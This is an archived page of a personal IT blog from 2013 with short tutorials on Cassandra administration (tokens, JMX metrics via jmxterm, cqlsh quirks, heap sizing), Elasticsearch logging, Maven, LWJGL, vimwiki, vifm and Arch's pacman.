Information Technology Blogs: 2013

Tuesday, December 31, 2013

Happy new year!

My software pick of 2013
* So the year is coming to the end, time to evaluate, when I look back at
2013, to see what software I used the most, compare to 2012, one piece of software
come to mind vimwiki, a personal wiki system for vim, I know it don't sound
like much, but it is just so much more, the wiki part refer to the way it use
links, in the previous version vimwiki used CamelBack to make a link, in the
latest all words can be used as a link, and you can link to files on your pc
or on the web.

from the homepage:http://code.google.com/p/vimwiki/
* With vimwiki you can
* organize notes and ideas
* manage todo-lists
* write documentation

* I use it for many purpose, note, blogs, todo, appointment, projects etc.
Before vimwiki I used zim it's a nice gui wiki, but the great think with
vimwiki is all the time I used to learn navigate in vim pays of, so I jump
around in my wiki-pages with a speed no gui tool can match, and all is kept
in text files, so the footprint on the harddrive is very small.

* I been using vimwiki for most of 2013 and my wiki-folder is only 392K, so
it's fast even if you put it on dropbox or local server, vimwiki has many
options to fit your needs, look up the vimwiki help file to learn more, a nice
thing is that you can have as many wiki's as you need, like one for work and
one private, one for a single project. I can't encourage you enough to read the
help file. So you can get the most out of this handy tool. I use it all day
every day, the speed and power from vim, in a wiki-tool, don't get better
then this.

* Thanks to habamax for this wonderful plugin.

* What is your software pick of 2013?

Cassandra cluster jmx metrics inspection to decide if cluster expansion is justifiable

One of the important decision during managing the clusters is to determine when cluster capacity should expand. To maintain a cluster in optimal performance will give the applications working nicely and most importantly, it give confidence to the people.

So, to answer question like, how do I determine if my cluster is at bottleneck? To answer this type of question, you will need to have the measuring tools ready and measure over time. Meaning that you need to display statistics in graphical form and with the history, it should give an indication of the cluster performance.

Because the topic will grow huge, hence, we will focus on a specific metric. This article gonna inspect the metric exposed by the jmx beans. In order to inspect the jmx metrics, you will need a jmx client. There is a gui jmx client that comes with the jdk, that is jconsole. Because nature of this article, I would suggest you go for cli jmx client, for example jmxterm. You can read introduction of jmxterm here.

There are many metrics exposed by cassandra jmx beans. But we will focus on bean org.apache.cassandra.db:type=CompactionManager.

If you are using jmxterm, you can read the output below:

$ cat test.script 
open localhost:7199
bean org.apache.cassandra.db:type=CompactionManager
get PendingTasks
$ java -jar jmxterm-1.0-alpha-4-uber.jar -i test.script 
Welcome to JMX terminal. Type "help" for available commands.
#Connection to localhost:7199 is opened
#bean is set to org.apache.cassandra.db:type=CompactionManager
#mbean = org.apache.cassandra.db:type=CompactionManager:
PendingTasks = 0;

So if you plot PendingTasks in a graph over time with a periodic interval, it should give insight to your cluster performance. You can also plot the statistics output from nodetool tpstats. I would suggest also, you plot Message type dropped as those metrics indicate over time that the performance is impacted. If you have a stock cassandra settings, you will probably want to fine tune to your node at this point after this investigation and analysis on the graph.

There is no best strategies, as mentioned earlier, you need experience and there are many other metrics measuring tools, example sar , iostats, top, your application measurement. So it take some times to even master all of these but it is crucial if you managed a production cluster.

Thursday, December 26, 2013

cassandra 2.0 catch 101 – part5

Our cluster status.

Datacenter: datacenter1
=======================
Status=Up/Down
|/ State=Normal/Leaving/Joining/Moving
--  Address         Load       Tokens  Owns   Host ID                               Rack
UN  192.168.33.31  147.34 KB  512     34.3%  f13c9390-4c52-4fc2-afa8-f7f74e7fd710  rack1
UN  192.168.33.32  123.31 KB  512     33.2%  bc7fcfcc-9a30-4929-bf24-35ec770856a3  rack1
UN  192.168.33.33  160.74 KB  256     16.5%  999d58bf-2b31-49ff-a452-6f0d01598429  rack1
UN  192.168.33.34  137.39 KB  256     16.0%  222796e9-d330-469a-8dcd-3f3581c9d795  rack1

So it is pretty interesting that a node can own different amount of cluster load based on the tokens specified. Because in our cluster environment, we have different types of hardware and for instance, mine is pretty old. With default settings, a default of 512 tokens is assigned.

The setting for tokens can be found in cassandra.yaml

# This defines the number of tokens randomly assigned to this node on the ring
# The more tokens, relative to other nodes, the larger the proportion of data
# that this node will store. You probably want all nodes to have the same number
# of tokens assuming they have equal hardware capability.
#
# If you leave this unspecified, Cassandra will use the default of 1 token for legacy compatibility,
# and will use the initial_token as described below.
#
# Specifying initial_token will override this setting.
#
# If you already have a cluster with 1 token per node, and wish to migrate to
# multiple tokens per node, see http://wiki.apache.org/cassandra/Operations
num_tokens: 512

Just note that this setting is one time only when a join the cluster. Meaning that the first time it join, 512 tokens will be assign for this node and this tokens will be store in the keyspace system and in column family local. Even if you removed the data directory and start all over, the data will be stream from other nodes, hence, the information is still persists. If you really want to change at later day, it is possible, you may want to treat this node as dead through decommission, stop cassandra instance. Change the num_tokens configuration in yaml file and then start cassandra instance back. You may want to think about this because decommission stream data to other servers and it may create load in system and also network traffic.

Wednesday, December 25, 2013

Lightweight Java Game Library

Since childhood, gaming has been one of my favorite activities. If you are from 80s, Supermario should sound familiar to you. =) 30 years had passed, gaming development improve tremendously over the period.

In this article, we are going to explore gaming development. Most of the gaming is written in low level languages, example C and thus, it is very complicated. This certainly introduced steep learning curve if you are a beginner. Hence, we will choose a simple startup to learn about gaming development. A example of library that can be use is Lightweight Java Game Library or its acronym LWJGL.

What is Lightweight Java Game Library?

The Lightweight Java Game Library (LWJGL) is a solution aimed directly at professional and amateur Java programmers alike to enable commercial quality games to be written in Java. LWJGL provides developers access to high performance crossplatform libraries such as OpenGL (Open Graphics Library), OpenCL (Open Computing Language) and OpenAL (Open Audio Library) allowing for state of the art 3D games and 3D sound. Additionally LWJGL provides access to controllers such as Gamepads, Steering wheel and Joysticks. All in a simple and straight forward API.

Because nature of this library deal with graphic display, hence the hardware display driver must be setup correctly. For me, my workstation is using ati radeon, and using xserver-xorg-video-radeon and enable 3D acceleration with package libgl1-mesa-dri. We won't delve deep into graphic driver installation and configuration since our focus here is the gaming development. You can check if your drive is setup properly by running glxgears via a terminal. If a windows popup with three gears spinning, your driver install and setup should be fine to continue for this coding tutorial.

In the official wiki, it is well written and documented to get you started. With this, I have setup my eclipse environment in debian sid. The library needed to should be setup in the project build path so when you run your application, the library is detected. Because I'm running linux, the native library location is pointed to lwjgl-2.9.1/native/linux. These two library must be configured before any development begin. If you noticed, I've setup the source as well, it will be convienient to read the code if you need to be sure later down the road during coding phase.

There are many tutorials to pick from, as a start, I just pick the basics - LWJGL Basics 1 (The Display). The source code should be in the link, and it is incredibly easy to create the display with few lines of codes and I got that window display with just initial try. Very impressive and promising.

It is pretty impressive what this library can do. There are many examples that come in the library and one of it is an example game. Just execute

java -cp .:res:jar/lwjgl.jar:jar/lwjgl_test.jar:jar/lwjgl_util.jar:jar/jinput.jar: -Djava.library.path=native/linux org.lwjgl.examples.spaceinvaders.Game

if you are running linux. Run fine in my environment and played the bundle game; amazing. Maybe in my next article, I'm gonna try to even complete this .

Monday, December 23, 2013

Elasticsearch index slow log for search and indexing

Today, we are going to learn on the logging for elasticsearch for its search and index. In elasticsearch config file, elasticsearch.yml, it should have a configuration such as below:

################################## Slow Log ##################################

# Shard level query and fetch threshold logging.

#index.search.slowlog.threshold.query.warn: 10s
#index.search.slowlog.threshold.query.info: 5s
#index.search.slowlog.threshold.query.debug: 2s
index.search.slowlog.threshold.query.trace: 500ms

#index.search.slowlog.threshold.fetch.warn: 1s
#index.search.slowlog.threshold.fetch.info: 800ms
#index.search.slowlog.threshold.fetch.debug: 500ms
index.search.slowlog.threshold.fetch.trace: 200ms

#index.indexing.slowlog.threshold.index.warn: 10s
#index.indexing.slowlog.threshold.index.info: 5s
#index.indexing.slowlog.threshold.index.debug: 2s
index.indexing.slowlog.threshold.index.trace: 500ms

So with this example, I have enable tracing for search query and search fetch with 500ms and 200ms respectively. A search in elasticsearch consists of query time and fetch time. Hence the two configuration for search. Meanwhile, logging for elasticsearch index is also enable with a threshold of 500ms.

With these configuration sets, and if your indexing or search exceed that threshold,
an entry will be log into a file. The logging file should be located in path.log
that is set in elasticsearch.yml.

So what does the number really means? Excerpts from elasticsearch official documentation

The logging is done on the shard level scope, meaning the executionof a search request within a specific shard. It does not encompass the whole search request, which can be broadcast to several shards in order to execute. Some of the benefits of shard level logging is the association of the actual execution on the specific machine, compared with request level.

All settings are index level settings (and each index can have different values for it), and can be changed in runtime using the indexupdate settings API.

... and, I have tried updating the index setting via a simple tool I've made earlier on. But the idea is same, you just need to http get by putting the variable into the index setting. You can find more information here The key for the configuration is available at ShardSlowLogSearchService.java class.

[jason@node1 bin]$ ./indices-setting.sh set search.slowlog.threshold.query.trace 500
{
  "ok" : true,
  "acknowledged" : true
}

[2013-12-23 12:31:12,758][TRACE][index.search.slowlog.query] [node1] [index_test][146] took[1s], took_millis[1026], types[foo,bar], stats[], search_type[QUERY_THEN_FETCH], total_shards[90], source[{"size":80,"timeout":10000,"query":{"filtered":{"query":{"query_string":{"query":"maxis*","default_operator":"and"}},"filter":{"and":{"filters":[{"query":{"match":{"site":{"query":"www.google.com","type":"boolean"}}}},{"range":{"unixtimestamp":{"from":null,"to":1387825199000,"include_lower":true,"include_upper":true}}}]}}}},"filter":{"query":{"match":{"site":{"query":"www.google.com","type":"boolean"}}}},"sort":[{"unixtimestamp":{"order":"desc"}}]}], extra_source[],

With this example, it has exceed the threshold set at 500ms which it ran for 1 second.

As for indexing, the fundamental concept is the same, so we won't elaborate in this article and that should leave you as a tutorial. :-)

Sunday, December 22, 2013

Learning Jmxterm

If you have been using jconsole to inspect an application perform under jvm, you might want to look for alternative in command line form. In this article, we are going to spend sometime to learn on Jmxterm . So what is a Jmxterm? Jmxterm is a command line based interactive JMX client. It's designed to allow user to access a Java MBean server from command line without graphical environment. In another word, it's a command line based jconsole.

To get started, you will of cause, needed JDK installed and an java application that you want to inspect. To start using it , go to http://wiki.cyclopsgroup.org/jmxterm/download and start to download. You should have a jmxterm-[version].jar file.

So, I'm gonna demonstrate on how to use Jmxterm by showing with examples of a terminal output.

$ java -jar jmxterm-1.0-alpha-4-uber.jar
Welcome to JMX terminal. Type "help" for available commands.
$>help;
#IllegalArgumentException: Command help; isn't valid, run help to see available commands
$>help
#following commands are available to use:
about    - Display about page
bean     - Display or set current selected MBean.
beans    - List available beans under a domain or all domains
bye      - Terminate console and exit
close    - Close current JMX connection
domain   - Display or set current selected domain.
domains  - List all available domain names
exit     - Terminate console and exit
get      - Get value of MBean attribute(s)
help     - Display available commands or usage of a command
info     - Display detail information about an MBean
jvms     - List all running local JVM processes
open     - Open JMX session or display current connection
option   - Set options for command session
quit     - Terminate console and exit
run      - Invoke an MBean operation
set      - Set value of an MBean attribute
$> bean
null
$>beans
#IllegalStateException: Connection isn't open yet. Run open command to open a connection
$>domains
#following domains are available
#IllegalStateException: Connection isn't open yet. Run open command to open a connection
$>jvms
5552     ( ) - jmxterm-1.0-alpha-4-uber.jar
$>help open
usage: open [-h] [-p <val>] [-u <val>]
Open JMX session or display current connection
  -h,--help            Display usage
  -p,--password <val>  Password for user/password authentication
  -u,--user <val>      User name for user/password authentication
Without argument this command display current connection. URL can be a <PID>,
<hostname>:<port> or full qualified JMX service URL. For example
open localhost:9991,
open jmx:service:...
$>open 192.168.0.2:7199
#RuntimeIOException: Runtime IO exception: Connection refused to host: 127.0.0.1; nested exception is:
	java.net.ConnectException: Connection refused
$>open localhost:7199
#Connection to localhost:7199 is opened
$>bean
null
$>bean org.apache.cassandra.db:columnfamily=IndexInfo,keyspace=system,type=ColumnFamilies
#bean is set to org.apache.cassandra.db:columnfamily=IndexInfo,keyspace=system,type=ColumnFamilies
$>info
#mbean = org.apache.cassandra.db:columnfamily=IndexInfo,keyspace=system,type=ColumnFamilies
#class name = org.apache.cassandra.db.ColumnFamilyStore
# attributes
  %0   - AutoCompactionDisabled (boolean, r)
  %1   - BloomFilterDiskSpaceUsed (long, r)
  %2   - BloomFilterFalsePositives (long, r)
  %3   - BloomFilterFalseRatio (double, r)
  %4   - BuiltIndexes (java.util.List, r)
  %5   - ColumnFamilyName (java.lang.String, r)
  %6   - CompactionStrategyClass (java.lang.String, rw)
  %7   - CompressionParameters (java.util.Map, rw)
  %8   - CompressionRatio (double, r)
  %9   - CrcCheckChance (double, w)
  %10  - DroppableTombstoneRatio (double, r)
  %11  - EstimatedColumnCountHistogram ([J, r)
  %12  - EstimatedRowSizeHistogram ([J, r)
  %13  - LifetimeReadLatencyHistogramMicros ([J, r)
  %14  - LifetimeWriteLatencyHistogramMicros ([J, r)
  %15  - LiveCellsPerSlice (double, r)
  %16  - LiveDiskSpaceUsed (long, r)
  %17  - LiveSSTableCount (int, r)
  %18  - MaxRowSize (long, r)
  %19  - MaximumCompactionThreshold (int, rw)
  %20  - MeanRowSize (long, r)
  %21  - MemtableColumnsCount (long, r)
  %22  - MemtableDataSize (long, r)
  %23  - MemtableSwitchCount (int, r)
  %24  - MinRowSize (long, r)
  %25  - MinimumCompactionThreshold (int, rw)
  %26  - PendingTasks (int, r)
  %27  - ReadCount (long, r)
  %28  - RecentBloomFilterFalsePositives (long, r)
  %29  - RecentBloomFilterFalseRatio (double, r)
  %30  - RecentReadLatencyHistogramMicros ([J, r)
  %31  - RecentReadLatencyMicros (double, r)
  %32  - RecentSSTablesPerReadHistogram ([J, r)
  %33  - RecentWriteLatencyHistogramMicros ([J, r)
  %34  - RecentWriteLatencyMicros (double, r)
  %35  - SSTableCountPerLevel ([I, r)
  %36  - SSTablesPerReadHistogram ([J, r)
  %37  - TombstonesPerSlice (double, r)
  %38  - TotalDiskSpaceUsed (long, r)
  %39  - TotalReadLatencyMicros (long, r)
  %40  - TotalWriteLatencyMicros (long, r)
  %41  - UnleveledSSTables (int, r)
  %42  - WriteCount (long, r)
# operations
  %0   - long estimateKeys()
  %1   - void forceMajorCompaction()
  %2   - java.util.List getSSTablesForKey(java.lang.String p1)
  %3   - void loadNewSSTables()
  %4   - void setCompactionThresholds(int p1,int p2)
#there's no notifications
$>get WriteCount
#mbean = org.apache.cassandra.db:columnfamily=IndexInfo,keyspace=system,type=ColumnFamilies:
WriteCount = 0;
$>get TotalDiskSpaceUsed
#mbean = org.apache.cassandra.db:columnfamily=IndexInfo,keyspace=system,type=ColumnFamilies:
TotalDiskSpaceUsed = 9437;

So, a brief explanation on what I have just done. To start, you will need to run the Jmxterm from a terminal. To understand what commands it has and what can you use for, simply issued command help. In order to inspect, you will need to open a connection to the jvm. Once a connection is established, you get do all sort of operations and in this example, I'm connected to cassandra and inspect on its bean org.apache.cassandra.db:columnfamily=IndexInfo,keyspace=system,type=ColumnFamilies and get the WriteCount and TotalDiskSpaceUsed statistics.

That's all folks! Hope you get an idea on what it does and where it is applicable to you.

Saturday, December 21, 2013

vifm a true gem

filemanager goes vim

* A ncurse file manager, with vim like UI for a vim user you will feel right
at home, command like the dd delete line just like in vim, and move to other
window and type p past the line in the "clipboard" to it. And the normal move
command like the hjkl works as expected jk down/up item in list and hl
up/down directory. like in vim most settings are made in it's rc file, the
vifmrc is in ~/.vifm to get an idea about all the option you have in vifm go
to http://vifm.sourceforge.net/docs.html#OPTIONS it's amazing what you can do
with vifm, if you like me has been using vim for sometime this filemanager is
a true gem. And much like vim, the options are "endless" browse on the project
homepage or at github.com. You will find the sourcecode/setup and help to make your own
setup. I often look at the config/setup on github to get idea's and mabye
improve my setup.

* On http://vifm.sourceforge.net/docs.html is the documentation for vifm.

* I must say after using vifm for some time, and done some github'ing made my
own vifmrc some nice filetype setting and hard-bookmarks, it's like vim the
more you use it, and add to your rc file the better and faster it get.

* So thanks to ksteen & xaizek for this power-tool.

Friday, December 20, 2013

A maven introduction.

So recently, I have been working on an opensource project and stumble upon maven. So I'm all ant guy (with ant background), and guess that to use maven should not be that difficult to start using it.

When you see a file in the java project, pom.xml, this should tell you that it is a maven configuration file. So for instance, in a as simple java project, it would look like

+-------------+
|project home |
+--+----------+
   |      
   |      +-------+
   +------+  src  |
   |      +---+---+
   |          |     +------+
   |          +-----+ main |
   |          |     +--+---+
   |          |        |    +----------+
   |          |        +----+   java   |
   |          |        |    +----------+
   |          |        |    +----------+
   |          |        +----+ resources|
   |          |             +----------+
   |          |     +------+
   |          +-----+ test |
   |                +--+---+
   |                   |    +----------+
   |                   +----+   java   |
   |                   |    +----------+
   |                   |    +----------+
   |                   +----+ resources|
   |     +--------+         +----------+
   +-----+ target |
   |     +--------+
   |     +--------+
   +-----+ pom.xml|
         +--------+

The most basic command that you ever gonna use and use it very often would probably

mvn package

With above command, mvn will compile your class, run any tests and package the deliverable code and resources into target/my-app-1.0.jar . If mvn produced this jar, this should be enough and that the developer should be able to concentrate the java project.

But if you are adventurous and want to know more about maven, continue to read on. There are a few maven phases which you can issue the command. The following is the standard maven lifecycle with an ordered phases.

process-resources

compile

process-test-resources

test-compile

test

package

install

deploy

So in order to satisfy the library dependencies of your project, you should specify coordinate of the lib that it depends into pom.xml. You can use this site to search for the libraries it depends.

I hope this answer a simple start up to use maven to assist in your java project. If you reach here and have further question, this link and this link .

Changing ElasticSearch logging level by updating cluster setting.

In this article, we are going to learn how to update logging for all the in the elasticsearch cluster. Because logging is crucial in understanding the system behaviour, so from time to time, change the logging level in elasticsearch via elasticsearch.yml and restart elasticsearch instance so that the logging level will be pick up. Unfortunately restart on the live production will take sometime (because of the shards recovery) and this could not be efficient.

Luckily, there is a setting in the cluster which allow the logging level to be change on the fly.

So with that, if you want to understand the what's happening in the cluster node, you can change the logging

e.g.

curl -XPUT localhost:9200/_cluster/settings -d '{
"transient" : {
"logger.cluster.service" : "DEBUG"
}
}'

and tail the elasticsearch log, you should see some log started appearing. Because logging is managed by the class NodeSettingsService, so you should read into the elasticsearch package that initialized with this class. Example elasticsearch package, cluster.service, cluster.routing.allocation.allocator, indices.ttl.IndicesTTLService, etc. Note that the package prefix, org.elastic is not needed when the setting is updated.

If you want more information, this link would provide better help.

Friday, December 6, 2013

cassandra 2.0 catch 101 – part4

It has been a while since I last post, mainly was due to the abundane works. :-( In this article, I'm gonna share with the lesson learned on cassandra 2.0.2 learned using cqlsh 4.1.0.

Last we had to remove all the files in /var/lib/cassandra/ simply because somewhere it break when we upgraded from cassandra 2.0.0 to 2.0.2 and everybody in the teams just do not have the time to goes into details. So since this is just4fun cluster, we agreed to removed the dir /var/lib/cassandra/ and start the cluster using cassandra 2.0.2.

In order to better understand cassandra, we take a detail look at alter table. But before that, let's create a new keyspace and table.

cqlsh> CREATE KEYSPACE jw_schema1 WITH replication = {'class':'SimpleStrategy', 'replication_factor':3};
cqlsh>

and the correspondance cassandra system.log

INFO [Thrift:7] 2013-12-06 16:17:21,902 MigrationManager.java (line 217) Create new Keyspace: jw_schema1, rep strategy:SimpleStrategy{}, strategy_options: {replication_factor=3}, durable_writes: true

cassandra 2.0 catch 101 – part3

So many of us are from mysql / postgres background and we quickly interface to the database using the command line. In order to comment in cassandra cql, it is different than in sql. Read the example below

cqlsh:jw_schema1> #select * from users;
Invalid syntax at line 1, char 1
#select * from users;
^
cqlsh:jw_schema1> --select * from users;
cqlsh:jw_schema1> -select * from users;
Bad Request: line 1:0 no viable alternative at input '-'
cqlsh:jw_schema1> -- select * from users;
cqlsh:jw_schema1>

So as you can see, the hash glyph do not work in cqlsh, you need to use double dashes in front of the comment you want to made.

Voila! =)

Saturday, November 30, 2013

how does read performance gains when in compression?

Read the following interesting discussion in the cassandra mailing list, and think very good explanation and would like to share out.

how does read performance gains when in compression?
http://www.datastax.com/dev/blog/whats-new-in-cassandra-1-0-compression
http://www.datastax.com/documentation/cassandra/1.2/webhelp/index.html?pagename=docs&version=1.2&file=index#cassandra/dml/dml_about_reads_c.html

Cite from Artur Kronenberg
The way I understand it is that compression gives you the advantage of having to use way less IO and rather use CPU. The bottleneck of reads is usually the IO time you need to read the data from disk. As a figure, we had about 25 reads/s reading from disk, while we get up to 3000 reads/s when we have all of it in cache. So having good compression reduces the amount you have to read from disk. Rather you may spend a little bit more time decompressing data, but this data will be in cache anyways so it won't matter.

Cite from Edward Capriolo
The big * in the explanation: Smaller file size footprint leads to better disk cache, however decompression adds work for the JVM to do and increases the churn of objects in the JVM. Additionally compression block sizes might be 4KB while for some use cases a small row may be 200bytes. This means that internally a large block might be decompressed to get at the row inside of it.

In many use cases compression is a performance win, but not necessarily in all cases. In particular if you are already doing JVM performance tuning issues to stop garbage collection pauses enabling compression could make performance worse.

Thursday, November 14, 2013

C++ "hello world" (test syntax highlight)

#include <iostream>
int main()
{
    std::cout << "hello world" << std::endl;

    return 0;
}

Wednesday, November 13, 2013

cassandra 2.0 catch 101 – part2

After playing playing around cassandra 2.0 for quite sometime and in this article, I'm gonna share with you a strange issue that encountered, unable to drop table no matter how.

I'm using the stress tools in cassandra package to create the table column family. It seem that the keyspaces and table created successfully. Following are the output.


Created keyspaces. Sleeping 1s for propagation.
total,interval_op_rate, interval_key_rate,latency,95th,99.9th,elapsed_time
..
..
..

So everything seem to created okay in cassandra.

cqlsh:system> desc keyspaces;

jw_schema1 system system_traces

cqlsh:system> use jw_schema1;
cqlsh:jw_schema1> desc tables;

Counter1 Counter3 Standard1 Super1 SuperCounter1

cqlsh:jw_schema1> desc table Counter1;

CREATE TABLE "Counter1" (
key blob,
column1 ascii,
value counter,
PRIMARY KEY (key, column1)
) WITH COMPACT STORAGE AND
bloom_filter_fp_chance=0.010000 AND
caching='KEYS_ONLY' AND
comment='' AND
dclocal_read_repair_chance=0.000000 AND
gc_grace_seconds=864000 AND
index_interval=128 AND
read_repair_chance=0.100000 AND
replicate_on_write='true' AND
populate_io_cache_on_flush='false' AND
default_time_to_live=0 AND
speculative_retry='NONE' AND
memtable_flush_period_in_ms=0 AND
compaction={'class': 'SizeTieredCompactionStrategy'} AND
compression={};

cqlsh:jw_schema1>

when selecting or dropping table in any tables within the keyspaces, things started to become wrong and cassandra server debug log show nothing wrong.

cqlsh:jw_schema1> select * from Counter1;
Bad Request: unconfigured columnfamily counter1
cqlsh:jw_schema1>

DEBUG [Thrift:105] 2013-11-13 20:55:29,050 CassandraServer.java (line 1932) execute_cql3_query
DEBUG [Thrift:105] 2013-11-13 20:55:29,050 Tracing.java (line 159) request complete

cqlsh:jw_schema1> drop table Counter1;
Bad Request: Cannot drop non existing column family 'counter1' in keyspace 'jw_schema1'.
cqlsh:jw_schema1>

DEBUG [Thrift:105] 2013-11-13 20:55:59,392 CassandraServer.java (line 1932) execute_cql3_query
DEBUG [Thrift:105] 2013-11-13 20:55:59,393 Tracing.java (line 159) request complete

and using the datastax java binary driver.

public void connect(String node) {
    cluster = Cluster.builder().addContactPoint(node)
        .addContactPoints("127.0.0.1")
	.withRetryPolicy(DowngradingConsistencyRetryPolicy.INSTANCE)
	.withReconnectionPolicy(new ConstantReconnectionPolicy(100L)).build();
    session = cluster.connect("jw_schema1");

    ExecutionInfo info = session.execute("DROP TABLE Counter1").getExecutionInfo();
}

Exception in thread "main" com.datastax.driver.core.exceptions.InvalidQueryException: Cannot drop non existing column family 'counter1' in keyspace 'jw_schema1'.
at com.datastax.driver.core.exceptions.InvalidQueryException.copy(InvalidQueryException.java:35)
at com.datastax.driver.core.ResultSetFuture.extractCauseFromExecutionException(ResultSetFuture.java:271)
at com.datastax.driver.core.ResultSetFuture.getUninterruptibly(ResultSetFuture.java:187)
at com.datastax.driver.core.Session.execute(Session.java:126)
at com.datastax.driver.core.Session.execute(Session.java:77)
at foo.bar.main.SimpleClient.connect(SimpleClient.java:38)
at foo.bar.main.SimpleClient.main(SimpleClient.java:69)
Caused by: com.datastax.driver.core.exceptions.InvalidConfigurationInQueryException: Cannot drop non existing column family 'counter1' in keyspace 'jw_schema1'.
at com.datastax.driver.core.Responses$Error.asException(Responses.java:97)
at com.datastax.driver.core.ResultSetFuture$ResponseCallback.onSet(ResultSetFuture.java:122)
at com.datastax.driver.core.RequestHandler.setFinalResult(RequestHandler.java:217)
at com.datastax.driver.core.RequestHandler.onSet(RequestHandler.java:349)
at com.datastax.driver.core.Connection$Dispatcher.messageReceived(Connection.java:500)
at org.jboss.netty.channel.SimpleChannelUpstreamHandler.handleUpstream(SimpleChannelUpstreamHandler.java:75)
at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:565)
at org.jboss.netty.channel.DefaultChannelPipeline$DefaultChannelHandlerContext.sendUpstream(DefaultChannelPipeline.java:793)
at org.jboss.netty.channel.Channels.fireMessageReceived(Channels.java:296)
at org.jboss.netty.handler.codec.oneone.OneToOneDecoder.handleUpstream(OneToOneDecoder.java:71)
at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:565)
at org.jboss.netty.channel.DefaultChannelPipeline$DefaultChannelHandlerContext.sendUpstream(DefaultChannelPipeline.java:793)
at org.jboss.netty.channel.Channels.fireMessageReceived(Channels.java:296)
at org.jboss.netty.handler.codec.frame.FrameDecoder.unfoldAndFireMessageReceived(FrameDecoder.java:458)
at org.jboss.netty.handler.codec.frame.FrameDecoder.callDecode(FrameDecoder.java:439)
at org.jboss.netty.handler.codec.frame.FrameDecoder.messageReceived(FrameDecoder.java:303)
at org.jboss.netty.channel.SimpleChannelUpstreamHandler.handleUpstream(SimpleChannelUpstreamHandler.java:75)
at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:565)
at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:560)
at org.jboss.netty.channel.Channels.fireMessageReceived(Channels.java:268)
at org.jboss.netty.channel.Channels.fireMessageReceived(Channels.java:255)
at org.jboss.netty.channel.socket.nio.NioWorker.read(NioWorker.java:84)
at org.jboss.netty.channel.socket.nio.AbstractNioWorker.processSelectedKeys(AbstractNioWorker.java:472)
at org.jboss.netty.channel.socket.nio.AbstractNioWorker.run(AbstractNioWorker.java:333)
at org.jboss.netty.channel.socket.nio.NioWorker.run(NioWorker.java:35)
at org.jboss.netty.util.ThreadRenamingRunnable.run(ThreadRenamingRunnable.java:102)
at org.jboss.netty.util.internal.DeadLockProofWorker$1.run(DeadLockProofWorker.java:42)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
at java.lang.Thread.run(Thread.java:722)

So I'm not sure what is gone wrong, but I'end up dropping the keyspace as a work around.

cqlsh:system> drop keyspace jw_schema1;
cqlsh:system>

work around

cqlsh:system> desc keyspaces;

TestKeyspace  system  system_traces

cqlsh:system> drop keyspace TestKeyspace;
Bad Request: Cannot drop non existing keyspace 'testkeyspace'.
cqlsh:system> drop keyspace "TestKeyspace";
cqlsh:system> desc keyspaces;

system  system_traces

cqlsh:system>

Friday, October 18, 2013

How to generate murmur3 in cassandra2.0

Reading into this doc, got really curious on how the murmur3 hash value is generated.

So I dig at cassandra github, found this this class , it seem that, cassandra 2.0 generate the token for the primary key using this method hash3_x64_128. Below are the method to get it work.. just put this into any java class and see the token generated.

    

    public static LongToken genToken(String rowKey) {
        ByteBuffer key = ByteBufferUtil.bytes(rowKey);
        long hash = MurmurHash.hash3_x64_128(key, key.position(), key.remaining(), 0)[0];
        LongToken lk = new LongToken(normalize(hash));
        return lk;
    }

    public static void main(String[] args) {
        System.out.println(genToken("jim"));
    }
	
    private static long normalize(long v)
    {
        // We exclude the MINIMUM value; see getToken()
        return v == Long.MIN_VALUE ? Long.MAX_VALUE : v;
    }

with jim, it generated as 2680261686609811218. So that should be correct. Something extra, if you use nodetool to show the token ranges, e.g. nodetool -h localhost describering jw_schema1, you should get an idea with the token generated, the range on which nodes are responsible that hold the row data.

Allocate jvm heap more than 8GB for cassandra

What happen if you allocate jvm heap more than 8GB for cassandra instance? With my past experience, we allocate more than 16GB for the cassandra instance and it is still running fine. But occasionally we encounter performance issue when we increase more than 16GB to the heap. Google a little and found this doc

Excessive heap space size

DataStax recommends using the default heap space size for most use 
cases. Exceeding this size can impair the Java virtual machine's 
(JVM) ability to perform fluid garbage collections (GC). The 
following table shows a comparison of heap space performances 
reported by a Cassandra user:

Heap 	CPU utilization 	Queries per second 	Latency
40 GB 	50% 	                750             	1 second
8 GB 	5% 	                8500 (not maxed out) 	10 ms

For information on heap sizing, see Tuning Java resources.

As the benchmark indicate, the more heap you allocate, the higher the cpu usage is. Though the performance decrease is not linear but rather exponentially. So it is wise to keep the heap at 8GB or not more than 50% of that value. It is not deadly but it certainly decrease the performance of the cluster dramatically which would render it useless. If you encountered memory error in the log, in this situation, apart from other factors, it is better if you consider scale your cluster horizontally, that is adding more nodes to increase the capacity. But a quick workaround should you encounter memory error, the

So what happen really happen in the gc if high heap is allocated? well, excerpt from the guru,

..the concurrent mark/sweep phase runs concurrently with your
application. CMS will cause a stop-the-world full pause it it fails to
complete a CMS sweep in time and you hit the maximum heap size, but
unless that happens, CMS will run concurrently (though there are
stop-the-world pauses involved, that are typically very short, the
mark/sweep phase is concurrent).

Hence, if you really hit stop the world situation, this would render the node useless, because the node is too busy doing gc that, cassandra would not be able to perform.

http://www.mail-archive.com/user@cassandra.apache.org/msg17481.html
http://www.mail-archive.com/user@cassandra.apache.org/msg32312.html

Tuesday, October 15, 2013

arch install/remove/search packages

Much like aptitude on debian, archlinux also use the same tools to add and remove packages.

pacman is the packages handler on arch, but as on debian there are more then one tool for the job, pacman is the stock like apt-get is on debian. The commands I list here is the minimum you have to know, to handel packages on archlinux. pacman is a command-line tool.

pacman <options> packag1 pack2

to update: pacman -Syu

to install: pacman -S package1

to remove: pacman -R package1

to search: pacman -Ss pack-x

Always good practice to run pacman -Sy before any install, to be sure you get the latest package

Like on debian all the dependencies are solved by pacman.

This is just the most common used, to get the full information on it, go to the archwiki or man pacman.

cassandra 2.0 catch 101 - part1 - correct cassandra Unsupported major.minor version 51.0

This is another series of my journey to cassandra 2.0, if you have not read the previous post, you should read here

